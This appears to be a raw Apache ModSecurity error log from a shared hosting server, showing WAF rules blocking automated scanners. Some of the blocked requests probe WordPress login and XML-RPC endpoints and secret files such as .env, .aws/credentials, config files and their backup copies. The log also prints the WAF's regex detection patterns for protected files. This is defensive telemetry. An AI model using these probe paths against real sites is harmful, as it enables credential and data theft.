[Tue May 26 13:05:10.545757 2026] [security2:error] [pid 485064:tid 485066] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-blog.php"] [unique_id "ahVNLj9tlF55stOmSqEHWAAArwE"]
[Tue May 26 13:05:10.726303 2026] [security2:error] [pid 485064:tid 485121] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp.php"] [unique_id "ahVNLj9tlF55stOmSqEHXwAAmjg"]
[Tue May 26 13:05:10.921081 2026] [security2:error] [pid 485064:tid 485108] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/worksec.php"] [unique_id "ahVNLj9tlF55stOmSqEHYwAA4ys"]
[Tue May 26 13:05:11.093898 2026] [security2:error] [pid 485064:tid 485127] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-themes.php"] [unique_id "ahVNLz9tlF55stOmSqEHagAA3D4"]
[Tue May 26 13:05:11.265211 2026] [security2:error] [pid 485064:tid 485117] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-signin.php"] [unique_id "ahVNLz9tlF55stOmSqEHbgAA5zQ"]
[Tue May 26 13:05:11.437152 2026] [security2:error] [pid 485064:tid 485103] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-blog-header.php"] [unique_id "ahVNLz9tlF55stOmSqEHdQAA4iY"]
[Tue May 26 13:05:11.772926 2026] [security2:error] [pid 485064:tid 485219] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHOgAAnhg"], referer: http://kingsclub.in/.env-config.js
[Tue May 26 13:05:11.787847 2026] [security2:error] [pid 485064:tid 485172] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHPQAApWs"], referer: http://kingsclub.in/.env.js
[Tue May 26 13:05:11.835410 2026] [security2:error] [pid 485064:tid 485123] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ws.php"] [unique_id "ahVNLz9tlF55stOmSqEHkgAA6To"]
[Tue May 26 13:05:11.870704 2026] [security2:error] [pid 485064:tid 485067] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHQgAAiAI"], referer: http://kingsclub.in/config.json
[Tue May 26 13:05:11.922171 2026] [security2:error] [pid 485064:tid 485169] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHRwAAo2g"], referer: http://kingsclub.in/settings.py
[Tue May 26 13:05:11.933239 2026] [security2:error] [pid 485064:tid 485229] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHQwAAqAs"], referer: http://kingsclub.in/app/config/parameters.yml
[Tue May 26 13:05:11.991020 2026] [security2:error] [pid 485064:tid 485085] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHSAAApxQ"], referer: http://kingsclub.in/config/application.yml
[Tue May 26 13:05:12.007771 2026] [security2:error] [pid 485064:tid 485110] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wsa.php"] [unique_id "ahVNMD9tlF55stOmSqEHlwAA0C0"]
[Tue May 26 13:05:12.036855 2026] [security2:error] [pid 485064:tid 485265] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHSQAAzCA"], referer: http://kingsclub.in/config/parameters.yml
[Tue May 26 13:05:12.180039 2026] [security2:error] [pid 485064:tid 485115] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/w.php"] [unique_id "ahVNMD9tlF55stOmSqEHpQAAjzI"]
[Tue May 26 13:05:12.363096 2026] [security2:error] [pid 485064:tid 485111] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/x.php"] [unique_id "ahVNMD9tlF55stOmSqEHsAAA8i4"]
[Tue May 26 13:05:12.534984 2026] [security2:error] [pid 485064:tid 485116] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/xx.php"] [unique_id "ahVNMD9tlF55stOmSqEHvQAA7jM"]
[Tue May 26 13:05:12.575250 2026] [security2:error] [pid 485064:tid 485069] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHOAAAigQ"], referer: http://kingsclub.in/.aws/credentials
[Tue May 26 13:05:12.604729 2026] [security2:error] [pid 485064:tid 485313] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMD9tlF55stOmSqEHoQAAAPw"]
[Tue May 26 13:05:12.950878 2026] [security2:error] [pid 485064:tid 485113] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/xmlrpc.php"] [unique_id "ahVNMD9tlF55stOmSqEHxAAAtTA"]
[Tue May 26 13:05:13.123048 2026] [security2:error] [pid 485064:tid 485098] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/y.php"] [unique_id "ahVNMT9tlF55stOmSqEH0wAAhyE"]
[Tue May 26 13:05:14.565594 2026] [security2:error] [pid 485064:tid 485287] [client 52.167.144.221:40506] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVNMT9tlF55stOmSqEH6wAA4l4"]
[Tue May 26 13:05:14.758047 2026] [security2:error] [pid 485064:tid 485284] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMj9tlF55stOmSqEIDAAAAN8"]
[Tue May 26 13:05:15.750085 2026] [security2:error] [pid 485064:tid 485250] [client 37.46.113.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMz9tlF55stOmSqEINAAAAL0"]
[Tue May 26 13:05:16.639104 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNND9tlF55stOmSqEIXwAAAN0"]
[Tue May 26 13:05:18.606229 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:49767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNNj9tlF55stOmSqEIxQAAAJQ"]
[Tue May 26 13:05:18.606373 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:49767] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNNj9tlF55stOmSqEIxQAAAJQ"]
[Tue May 26 13:05:19.517189 2026] [security2:error] [pid 485064:tid 485241] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNNz9tlF55stOmSqEI3gAAALQ"]
[Tue May 26 13:05:21.253440 2026] [security2:error] [pid 485064:tid 485243] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNOD9tlF55stOmSqEJHQAAALY"]
[Tue May 26 13:05:22.301964 2026] [security2:error] [pid 485064:tid 485090] [remote 5.250.187.247:53500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVNOj9tlF55stOmSqEJSQAAihk"]
[Tue May 26 13:05:24.096047 2026] [security2:error] [pid 485064:tid 485273] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNOz9tlF55stOmSqEJhQAAANQ"]
[Tue May 26 13:05:25.641966 2026] [security2:error] [pid 485064:tid 485067] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env"] [unique_id "ahVNPT9tlF55stOmSqEJ1QAA7wI"]
[Tue May 26 13:05:26.666344 2026] [security2:error] [pid 485064:tid 485224] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNPj9tlF55stOmSqEJ7wAAAKM"]
[Tue May 26 13:05:27.025534 2026] [security2:error] [pid 485064:tid 485083] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.backup"] [unique_id "ahVNPz9tlF55stOmSqEKFgAA5BI"]
[Tue May 26 13:05:27.207736 2026] [security2:error] [pid 485064:tid 485111] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.old"] [unique_id "ahVNPz9tlF55stOmSqEKFwAAnC4"]
[Tue May 26 13:05:27.391067 2026] [security2:error] [pid 485064:tid 485101] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.bak"] [unique_id "ahVNPz9tlF55stOmSqEKGAAAoiQ"]
[Tue May 26 13:05:27.765091 2026] [security2:error] [pid 485064:tid 485069] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.orig"] [unique_id "ahVNPz9tlF55stOmSqEKKAABAgQ"]
[Tue May 26 13:05:27.947840 2026] [security2:error] [pid 485064:tid 485114] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.copy"] [unique_id "ahVNPz9tlF55stOmSqEKLAAA3jE"]
[Tue May 26 13:05:29.032675 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNQD9tlF55stOmSqEKSgAAALs"]
[Tue May 26 13:05:29.095688 2026] [security2:error] [pid 485064:tid 485243] [client 157.20.138.61:50092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNQT9tlF55stOmSqEKWgAAALY"]
[Tue May 26 13:05:29.095804 2026] [security2:error] [pid 485064:tid 485243] [client 157.20.138.61:50092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNQT9tlF55stOmSqEKWgAAALY"]
[Tue May 26 13:05:29.996219 2026] [security2:error] [pid 485064:tid 485146] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.swp"] [unique_id "ahVNQT9tlF55stOmSqEKfwAA4VE"]
[Tue May 26 13:05:30.178248 2026] [security2:error] [pid 485064:tid 485144] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.swo"] [unique_id "ahVNQj9tlF55stOmSqEKgwAA8E8"]
[Tue May 26 13:05:30.360760 2026] [security2:error] [pid 485064:tid 485160] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env~"] [unique_id "ahVNQj9tlF55stOmSqEKjgAAo18"]
[Tue May 26 13:05:31.495395 2026] [security2:error] [pid 485064:tid 485308] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNQz9tlF55stOmSqEKpQAAAPc"]
[Tue May 26 13:05:31.498045 2026] [security2:error] [pid 485064:tid 485143] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/env.php"] [unique_id "ahVNQz9tlF55stOmSqEKugAA4k4"]
[Tue May 26 13:05:31.717084 2026] [security2:error] [pid 485064:tid 485278] [client 40.82.218.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVNQz9tlF55stOmSqEKxgAAANk"]
[Tue May 26 13:05:32.261389 2026] [security2:error] [pid 485064:tid 485192] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/env.bak"] [unique_id "ahVNRD9tlF55stOmSqEK4QAA2n8"]
[Tue May 26 13:05:32.444491 2026] [security2:error] [pid 485064:tid 485186] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/env.old"] [unique_id "ahVNRD9tlF55stOmSqEK5AAAtXk"]
[Tue May 26 13:05:33.159700 2026] [security2:error] [pid 485064:tid 485321] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNRD9tlF55stOmSqEK8AAAAQQ"]
[Tue May 26 13:05:34.686266 2026] [security2:error] [pid 485064:tid 485182] [remote 160.250.186.220:40544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVNRj9tlF55stOmSqELQgAAqXU"]
[Tue May 26 13:05:36.181962 2026] [security2:error] [pid 485064:tid 485280] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNRz9tlF55stOmSqELfQAAANs"]
[Tue May 26 13:05:36.232937 2026] [security2:error] [pid 485064:tid 485292] [client 82.21.231.153:51613] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVNRz9tlF55stOmSqELewAAAOc"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 13:05:38.487173 2026] [security2:error] [pid 485064:tid 485277] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSj9tlF55stOmSqEL2wAAANg"]
[Tue May 26 13:05:39.518846 2026] [security2:error] [pid 485064:tid 485196] [client 140.213.148.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSz9tlF55stOmSqEMDAAAAIc"]
[Tue May 26 13:05:39.623926 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:50368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNSz9tlF55stOmSqEMHwAAANY"]
[Tue May 26 13:05:39.624099 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:50368] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNSz9tlF55stOmSqEMHwAAANY"]
[Tue May 26 13:05:40.370454 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSz9tlF55stOmSqEMMgAAALI"]
[Tue May 26 13:05:41.298274 2026] [access_compat:error] [pid 485064:tid 485242] [client 185.177.72.30:0] AH01797: client denied by server configuration: /home2/samayikp/public_html/.htaccess
[Tue May 26 13:05:41.490580 2026] [authz_core:error] [pid 485064:tid 485262] [client 185.177.72.30:0] AH01630: client denied by server configuration: /home2/samayikp/public_html/.htpasswd
[Tue May 26 13:05:41.673878 2026] [security2:error] [pid 485064:tid 485088] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.bak"] [unique_id "ahVNTT9tlF55stOmSqEMdQAA2Rc"]
